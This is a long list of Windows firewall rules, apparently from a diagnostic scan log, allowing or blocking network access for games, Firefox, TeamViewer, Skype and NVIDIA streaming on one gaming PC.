FirewallRules: [TCP Query User{919F3E59-577F-44C2-AF6C-D2415892A34F}D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe] => (Allow) D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe
FirewallRules: [UDP Query User{DB90A332-F5EA-49D2-8E43-FCC154C6F37D}D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe] => (Allow) D:\spel\stronghold crusader 2 special edition\bin\win32_release\crusader2.exe
FirewallRules: [{5356E309-436E-4CF2-8A99-9856AF496BB4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [{6A61A7BD-6C5A-4910-919B-EC0FC525542A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SpeedRunners\SpeedRunners.exe
FirewallRules: [TCP Query User{FC0B950D-598B-4C27-A099-212AF8985044}D:\spel\the guild 2 - renaissance\guildii.exe] => (Allow) D:\spel\the guild 2 - renaissance\guildii.exe
FirewallRules: [UDP Query User{00E00E8D-85F0-4758-87E9-221252409F6D}D:\spel\the guild 2 - renaissance\guildii.exe] => (Allow) D:\spel\the guild 2 - renaissance\guildii.exe
FirewallRules: [{443644FB-CA4F-4265-80E1-2401DC456AA3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\FTL Faster Than Light\FTLGame.exe
FirewallRules: [{90227DFB-A226-4335-8C83-E4E636125810}] => (Allow) D:\Spel\Steam Library\SteamApps\common\FTL Faster Than Light\FTLGame.exe
FirewallRules: [{9DB566C5-FE69-4D9B-9888-9BA9DA0FF55F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Heroes & Generals\hngsteamlauncher.exe
FirewallRules: [{4586C9AA-F881-469D-83C9-0740267F80EE}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Heroes & Generals\hngsteamlauncher.exe
FirewallRules: [TCP Query User{562D9B3F-FF37-4838-A818-95867EC2F001}D:\spel\commandos 3\commandos 3\commandos3.exe] => (Allow) D:\spel\commandos 3\commandos 3\commandos3.exe
FirewallRules: [UDP Query User{35EA472F-9B38-4741-A493-C0E2D320595F}D:\spel\commandos 3\commandos 3\commandos3.exe] => (Allow) D:\spel\commandos 3\commandos 3\commandos3.exe
FirewallRules: [TCP Query User{B1446DB0-ECE7-48AC-882B-A2749E82368B}D:\spel\commandos ammo pack\commandos 1\mpserver.exe] => (Allow) D:\spel\commandos ammo pack\commandos 1\mpserver.exe
FirewallRules: [UDP Query User{B91C6D26-E31D-4DEF-BADB-CD74BA9FDDA1}D:\spel\commandos ammo pack\commandos 1\mpserver.exe] => (Allow) D:\spel\commandos ammo pack\commandos 1\mpserver.exe
FirewallRules: [TCP Query User{7469F425-6C13-47A9-BA48-5D46998357C7}D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe] => (Allow) D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe
FirewallRules: [UDP Query User{E94231AC-F983-4BAF-94F9-E888E0ED0C22}D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe] => (Allow) D:\spel\emulator\zsnes151\gammzsnes\zsnesw.exe
FirewallRules: [TCP Query User{D8F1C82F-6331-486C-B1BA-DDA2C8C2352B}D:\spel\alien isolation\ai.exe] => (Block) D:\spel\alien isolation\ai.exe
FirewallRules: [UDP Query User{561641AD-D5E2-4C02-8785-0EA2474ADFE1}D:\spel\alien isolation\ai.exe] => (Block) D:\spel\alien isolation\ai.exe
FirewallRules: [{C1488CAF-3F1D-4CBE-AC47-2287B7FDD3DF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{70A5D689-38BB-4673-A25F-19B5D3D737E6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\DayZ\DayZ_BE.exe
FirewallRules: [{38996998-D368-4063-98C0-E06AEB44023C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect.exe
FirewallRules: [{D6C44EC6-3F87-48CE-BAB8-E211A9DBC273}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect.exe
FirewallRules: [{02F07D3E-F3C3-4053-9743-D91FC25BFE3D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{8164E9B5-1CD4-4DEE-973A-2044F5D60E5F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{B0415D83-40EB-4823-ABD4-12D1066AB19E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{722FA4B4-31E2-4F37-AD00-61F59C03A845}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{6F83E4F5-AAA5-42DE-8F9D-FBB0BEB63EFC}D:\spel\hammerwatch\hammerwatch.exe] => (Allow) D:\spel\hammerwatch\hammerwatch.exe
FirewallRules: [UDP Query User{DB911C0D-75DB-45A8-86F6-9EF94D76AD42}D:\spel\hammerwatch\hammerwatch.exe] => (Allow) D:\spel\hammerwatch\hammerwatch.exe
FirewallRules: [TCP Query User{2351E6A2-122B-4E05-905A-88BDBF6DB57E}D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe
FirewallRules: [UDP Query User{A9B82257-97FF-426A-8632-55C2E5532F54}D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\combat_tutorial_demo\elitedangerous32.exe
FirewallRules: [TCP Query User{45050945-6D3F-4D57-9CC8-FDA007D83A8B}D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe
FirewallRules: [UDP Query User{E7B05CD4-74AA-40C8-9E10-7961E53F21DF}D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe] => (Allow) D:\spel\edlaunch\products\forc-fdev-d-1010\elitedangerous32.exe
FirewallRules: [{DC297BE2-B8D3-4C65-B87D-B63DC2C73B88}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{45C1643D-955A-4777-BE45-9ABDA65D7E07}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{A57A95CC-8712-4768-A828-D5C7A3C090F3}D:\spel\blur\blur nosteam\blur.exe] => (Block) D:\spel\blur\blur nosteam\blur.exe
FirewallRules: [UDP Query User{69952427-AF52-443D-A4E1-70B140A97672}D:\spel\blur\blur nosteam\blur.exe] => (Block) D:\spel\blur\blur nosteam\blur.exe
FirewallRules: [TCP Query User{16122460-E2CD-4566-B5DC-42712F3DE8EF}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [UDP Query User{5ECF7D77-E9FA-477D-A7E7-D7ED39C5A5F2}C:\windows\syswow64\dpnsvr.exe] => (Allow) C:\windows\syswow64\dpnsvr.exe
FirewallRules: [{A8D5F529-DCD1-4FDA-BAB7-21D75192F6DA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Besiege\Besiege.exe
FirewallRules: [{F73EF0DE-71F6-4D78-A751-ADBD04752DF9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Besiege\Besiege.exe
FirewallRules: [TCP Query User{6874CB65-0F5F-487E-96D2-2E9D41C236F5}D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe
FirewallRules: [UDP Query User{EDC5A005-882F-439D-9609-CD03815D3841}D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe] => (Allow) D:\spel\stronghold crusader extreme hd\stronghold_crusader_extreme.exe
FirewallRules: [{C1D9F0A3-FF2D-4386-B8A1-FC66E9C94E6C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cities_Skylines\Cities.exe
FirewallRules: [{269D0535-C251-4043-A842-DC60623DC634}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Cities_Skylines\Cities.exe
FirewallRules: [{7A779327-2587-4326-9D15-E79A2F3F055F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Toribash\toribash.exe
FirewallRules: [{8320FB98-828B-4932-9A94-21B867456F90}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Toribash\toribash.exe
FirewallRules: [TCP Query User{9999040C-3648-45A1-8B0E-BDF1B3CA133F}D:\spel\star wars rebellion\rebexe.exe] => (Allow) D:\spel\star wars rebellion\rebexe.exe
FirewallRules: [UDP Query User{90D2846A-4BE4-4E4D-B9D1-2DDDA98866D9}D:\spel\star wars rebellion\rebexe.exe] => (Allow) D:\spel\star wars rebellion\rebexe.exe
FirewallRules: [TCP Query User{C4B6E894-1C14-4A73-AB91-825B611F1E25}D:\spel\diaspora\fs2_open_diaspora_r1.exe] => (Allow) D:\spel\diaspora\fs2_open_diaspora_r1.exe
FirewallRules: [UDP Query User{718E056C-2030-4D29-B4D8-281FF84A0063}D:\spel\diaspora\fs2_open_diaspora_r1.exe] => (Allow) D:\spel\diaspora\fs2_open_diaspora_r1.exe
FirewallRules: [TCP Query User{981E6CCF-911E-4BB6-9BDE-F9BE60F1FC49}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{9D625DCF-2803-443A-A39F-5BB8D22EE3D1}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{796658D6-38B6-4B01-BFF0-6C9766F89B8F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [{026DA7C2-00A3-4743-8248-993D97678418}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Crypt of the NecroDancer\NecroDancer.exe
FirewallRules: [TCP Query User{25DBFAF5-8C5E-4951-B0F2-E3444F0BA6E4}D:\spel\itg\program\in the groove 2.exe] => (Block) D:\spel\itg\program\in the groove 2.exe
FirewallRules: [UDP Query User{31DB31AD-B312-4DB8-BFED-C898D6B379EA}D:\spel\itg\program\in the groove 2.exe] => (Block) D:\spel\itg\program\in the groove 2.exe
FirewallRules: [{08FD0B95-B6FF-4AAE-AD20-9D98F039FF7B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\KM_TPR.exe
FirewallRules: [{F936ABFF-170D-46EF-A8A8-9D3DC696C88F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\KM_TPR.exe
FirewallRules: [{A19D7310-0EA2-40F7-ACC1-4F8DF0C9F7C6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\hd\Knights_and_Merchants_steam.exe
FirewallRules: [{BEB0FEE9-4558-4DEF-B073-31911291551A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Knights and Merchants Historical Version\hd\Knights_and_Merchants_steam.exe
FirewallRules: [{9E75A985-D059-493E-84CE-E4DFAD5107DD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Torchlight II\ModLauncher.exe
FirewallRules: [{662A7F55-A717-4C86-B911-5CE3CFCF5E9F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Torchlight II\ModLauncher.exe
FirewallRules: [TCP Query User{D2AC309E-9958-42E6-B540-8EF8E661943B}D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [UDP Query User{AD605CAB-0CC7-411D-BACF-F5306499F43D}D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre64\bin\java.exe
FirewallRules: [{21308C21-15BC-4C73-AC44-2E6EED72A984}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Rochard\Rochard.exe
FirewallRules: [{E5D7FFC3-A7F6-4721-B0F8-4F35BF795C5F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Rochard\Rochard.exe
FirewallRules: [{6584EECA-A2DA-45B6-BF7E-81C0C250282A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{ECDAABD8-7E3F-40FB-A9CF-3C06B62FFB4C}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{0919E39F-10B6-4737-A5C2-62953C825226}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{4D350746-BCCC-483E-B8E2-12CAA6A40386}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{8E40FC5B-4072-47CF-8B69-8006BC435CB1}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D08EFB35-473A-442B-A543-E08464001647}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Westerado\WesteradoDB.exe
FirewallRules: [{6B7260B7-CE43-44F8-8F83-96BA07DF356B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Westerado\WesteradoDB.exe
FirewallRules: [{E2B7627B-628F-4B51-A780-A4EB9ECACEB6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 3\trine3_launcher.exe
FirewallRules: [{8C9BD548-32BF-49BB-9202-1AA981952EA0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Trine 3\trine3_launcher.exe
FirewallRules: [TCP Query User{FCC21E56-917A-448D-BC59-743E8D74F0C9}D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe
FirewallRules: [UDP Query User{0A5E8A79-55CB-47C8-BB0B-A12F2BC8F14C}D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe] => (Allow) D:\spel\steam library\steamapps\common\trine 3\trine3_64bit.exe
FirewallRules: [TCP Query User{1B858E4D-0485-4D54-9183-AE75B20D8854}D:\spel\soldat\soldat.exe] => (Allow) D:\spel\soldat\soldat.exe
FirewallRules: [UDP Query User{8DD1BFC3-FE50-4431-AE63-BD0DB0817ADA}D:\spel\soldat\soldat.exe] => (Allow) D:\spel\soldat\soldat.exe
FirewallRules: [{64BFD6AB-8E20-4AE9-AE23-725CF5FC849A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{A531C7D2-3E9E-4204-9643-7BCBB06617C8}D:\spel\empyrion galactic survival\empyrion.exe] => (Allow) D:\spel\empyrion galactic survival\empyrion.exe
FirewallRules: [UDP Query User{3D1F26BE-E928-4D9F-BFD3-391F2A07FF09}D:\spel\empyrion galactic survival\empyrion.exe] => (Allow) D:\spel\empyrion galactic survival\empyrion.exe
FirewallRules: [{F6B6969E-325A-4E1A-A90C-BEA2B1A1DAAA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{76E1DBB9-EFBC-48E9-B5BA-FE535A8685E2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [TCP Query User{E3106317-FDAA-4CD0-A39E-A660AF03548C}D:\spel\redalert1_online\cncnet5.exe] => (Allow) D:\spel\redalert1_online\cncnet5.exe
FirewallRules: [UDP Query User{64F31AA8-3C83-4940-8B7A-BB9F03D708A2}D:\spel\redalert1_online\cncnet5.exe] => (Allow) D:\spel\redalert1_online\cncnet5.exe
FirewallRules: [{9A30AC21-A19E-473C-846E-824196B9E37A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40kWA.exe
FirewallRules: [{AC88119B-D54F-4D22-A23F-FC336B5B3FE3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40kWA.exe
FirewallRules: [{F5A1B688-4DE9-4BF7-89D2-D0FE92D6CE43}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Soulstorm\Soulstorm.exe
FirewallRules: [{AB75E7A9-563F-4519-B6BA-128A465905E5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Soulstorm\Soulstorm.exe
FirewallRules: [{D7EABB63-C0E8-418D-9792-0512F31AD004}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe
FirewallRules: [{1CB74876-21DE-407F-A0B2-FDE7F9F38EC9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Dark Crusade\darkcrusade.exe
FirewallRules: [{9B9FF0BC-4B86-405E-AB5E-6F3AA8EE9A66}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40k.exe
FirewallRules: [{3AFD306B-53D9-45A5-90DD-884175D2831F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dawn of War Gold\W40k.exe
FirewallRules: [TCP Query User{11E3CD2A-BFE1-4427-BF04-4A1C75D2F196}D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe] => (Allow) D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe
FirewallRules: [UDP Query User{A69725A6-B8F4-42F0-A9BB-3100B4AC7F21}D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe] => (Allow) D:\spel\steam library\steamapps\common\dawn of war soulstorm\sscp\soulstorm.exe
FirewallRules: [TCP Query User{B4E0D202-9DD8-4535-BC9F-C83BC97D092D}D:\spel\redalert1_online\ra95-spawn.exe] => (Allow) D:\spel\redalert1_online\ra95-spawn.exe
FirewallRules: [UDP Query User{C88B50F5-D440-440A-8984-9524D85A6860}D:\spel\redalert1_online\ra95-spawn.exe] => (Allow) D:\spel\redalert1_online\ra95-spawn.exe
FirewallRules: [{1B83618F-D02D-42A8-9651-26E419CD1EFD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE.exe
FirewallRules: [{DCC47D05-2539-4E99-809D-58CD3ED4EBC8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE.exe
FirewallRules: [TCP Query User{7483B01C-FD81-471A-91F3-F27FD8DED9BD}D:\spel\steam library\steamapps\common\war thunder\aces.exe] => (Allow) D:\spel\steam library\steamapps\common\war thunder\aces.exe
FirewallRules: [UDP Query User{A1599774-927D-4906-A136-8EC9ACF6AFC7}D:\spel\steam library\steamapps\common\war thunder\aces.exe] => (Allow) D:\spel\steam library\steamapps\common\war thunder\aces.exe
FirewallRules: [{680C6942-7D40-4B01-9458-96ADE595E3AA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A9F7449B-0201-40D7-8E35-997E33F94A96}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8FA2650D-F133-4798-AA68-FA546B43510E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dr Langeskov, The Tiger, and The Terribly Cursed Emerald A Whirlwind Heist\DrLangeskov.exe
FirewallRules: [{F2EF4ACE-4392-41EA-9A3D-818A9B30333A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dr Langeskov, The Tiger, and The Terribly Cursed Emerald A Whirlwind Heist\DrLangeskov.exe
FirewallRules: [{6B5C548F-0E30-41E6-8D48-7A162673479B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Banished\Application-steam-x64.exe
FirewallRules: [{A5C0D7A5-9D50-4F01-8E97-27EC3563F5AB}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Banished\Application-steam-x64.exe
FirewallRules: [TCP Query User{2731C65B-2AA9-4B8E-B4DA-88ACF00DBE5B}D:\spel\helldivers\binaries\x64\helldivers.exe] => (Block) D:\spel\helldivers\binaries\x64\helldivers.exe
FirewallRules: [UDP Query User{2B62053B-324C-4636-91E9-DC9A0B7AAFF4}D:\spel\helldivers\binaries\x64\helldivers.exe] => (Block) D:\spel\helldivers\binaries\x64\helldivers.exe
FirewallRules: [TCP Query User{A66CA3B5-9472-41C7-8BD8-CAA2E73FAD07}D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [UDP Query User{A5C11343-440F-4262-BD52-9E2F69B4F9EF}D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) D:\spel\edlaunch\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [{9A330E71-4D27-42BC-9BC2-E5E8A8FF02CF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Screencheat\screencheat.exe
FirewallRules: [{2BC15E28-7E54-4572-A964-B96FC4DB517B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Screencheat\screencheat.exe
FirewallRules: [{568660FF-CAB1-45BA-B56E-43C90666721F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{9B05ECAE-6B44-4697-99A1-45B01D3DD64C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mount Your Friends\MountYourFriends.exe
FirewallRules: [{76A57225-C3BD-4B04-9B9A-7A40234CAB14}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Keep Talking and Nobody Explodes\ktane.exe
FirewallRules: [{92128767-4267-40DA-B246-B3621A522DA3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Keep Talking and Nobody Explodes\ktane.exe
FirewallRules: [TCP Query User{F4A54B63-A8E2-4452-8180-850077D20496}D:\spel\heroes of might and magic 3 complete\heroes3.exe] => (Allow) D:\spel\heroes of might and magic 3 complete\heroes3.exe
FirewallRules: [UDP Query User{1EB19545-AA76-4B4D-8FA0-89BC76AF3D9D}D:\spel\heroes of might and magic 3 complete\heroes3.exe] => (Allow) D:\spel\heroes of might and magic 3 complete\heroes3.exe
FirewallRules: [TCP Query User{1DB3C684-26CE-478E-B0DD-F51D8611E804}D:\spel\factorio_0.12.20\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.12.20\bin\x64\factorio.exe
FirewallRules: [UDP Query User{D68A1112-A5DA-4D38-A500-B16AB85A58D8}D:\spel\factorio_0.12.20\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.12.20\bin\x64\factorio.exe
FirewallRules: [TCP Query User{7A51F80D-554A-454F-9E5A-F539A4E5C285}D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe] => (Allow) D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe
FirewallRules: [UDP Query User{5D8931EF-4E7D-4C1D-9E38-AF85FB859C23}D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe] => (Allow) D:\spel\steam library\steamapps\common\space\spacegame\binaries\win64\spserver.exe
FirewallRules: [{6853BAB0-1C4A-4E18-B5B6-EECEF7E1DF09}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\Binaries\Win32\DepthGame.exe
FirewallRules: [{B567282B-F73F-4CEA-BE2F-2CBE938EAB18}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\Binaries\Win32\DepthGame.exe
FirewallRules: [{492F1B4D-3B0C-4C98-B606-579059012453}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP.exe
FirewallRules: [{56B6A10D-4D74-4722-BC01-33852584F8CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP.exe
FirewallRules: [{B86F862D-C8D6-4C3E-B788-B5C6D93F3C1A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SteamVRPerformanceTest\bin\win64\vr.exe
FirewallRules: [{E649E9B4-0ABB-490F-9692-A3E981030DF2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SteamVRPerformanceTest\bin\win64\vr.exe
FirewallRules: [{FA2A2058-9CC5-4459-9D95-47A89CD852E7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe
FirewallRules: [{ADCF1868-E26E-4EA4-85F6-A277BB4D94D6}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Orcs Must Die 2\build\release\OrcsMustDie2.exe
FirewallRules: [TCP Query User{DA1A4364-51A0-4A13-A617-34927AD2E0B4}D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe] => (Allow) D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe
FirewallRules: [UDP Query User{53DB7273-588B-4631-B918-C1DFCF0B5364}D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe] => (Allow) D:\spel\steam library\steamapps\common\orcs must die 2\build\game\orcsmustdie2.exe
FirewallRules: [{0974B5FB-67A5-4311-93C8-3E31C934201B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Battlefleet Gothic Armada\BattleFleetGothic.exe
FirewallRules: [{23BBB59C-4E38-4F12-ACB5-AF621E695D47}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Battlefleet Gothic Armada\BattleFleetGothic.exe
FirewallRules: [TCP Query User{14EF59FD-4CBE-4477-BBF6-400D49178375}D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe
FirewallRules: [UDP Query User{6417FD98-D5AA-4DA6-9D9A-088A5C581014}D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\battlefleet gothic armada\battlefleetgothic\binaries\win64\battlefleetgothic-win64-shipping.exe
FirewallRules: [TCP Query User{8623F9D7-F7B7-45A6-9E24-202C5CFE17C3}D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe] => (Allow) D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe
FirewallRules: [UDP Query User{D93CC1A3-71E8-4230-9363-9E43414DAB17}D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe] => (Allow) D:\spel\steam library\steamapps\common\guilty gear xrd -sign-\binaries\win32\guiltygearxrd.exe
FirewallRules: [{E9AB914A-8CDB-4D70-B686-42574EAB783E}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Environmental Station Alpha\Environmental Station Alpha.exe
FirewallRules: [{074E5D98-B4C1-47E6-BE65-7067C306E683}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Environmental Station Alpha\Environmental Station Alpha.exe
FirewallRules: [{EA0D1741-86B9-4111-A53B-D44A614EC2CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect Safe Mode.exe
FirewallRules: [{A81051AC-4649-42D9-B644-43E4ADEB4EC7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect Safe Mode.exe
FirewallRules: [{4ECF7C43-C7AC-41F1-AA43-78B4B7C00AA2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP_x64.exe
FirewallRules: [{2D1981B0-37C6-4A34-83FF-C25CDBFED6AB}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP_x64.exe
FirewallRules: [{750F14FD-12C1-459B-97AF-8045788F4A02}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe
FirewallRules: [{BFCEA83A-D98F-4CE9-AF70-0BEB8A98845D}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe
FirewallRules: [TCP Query User{26F32E06-8C99-4C4E-A88C-110F0BC5DEB9}D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll] => (Allow) D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll
FirewallRules: [UDP Query User{C97AC77B-B9AB-4ACF-BD03-C9C9FD6606B1}D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll] => (Allow) D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll
FirewallRules: [{638BA54D-2635-4759-BDFC-2D46474B6D37}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{E9B6E224-F758-479F-8277-959B1D50D0E5}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{1FE04074-9729-4611-A59B-6D1AD71FD0C4}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{3280B250-6F0E-46DD-8C7B-3AEE07BD6DA7}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{547FC444-5AC5-4171-8C2B-BC25DA6AD60F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{A70540E2-2F15-4B16-8EBF-9223237DB1D7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{B7FB3B81-9945-4456-AB4E-F3F462731DE7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE_executable.exe
FirewallRules: [{8D737F82-F9FE-4C2D-9234-9B6578374AE1}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE_executable.exe
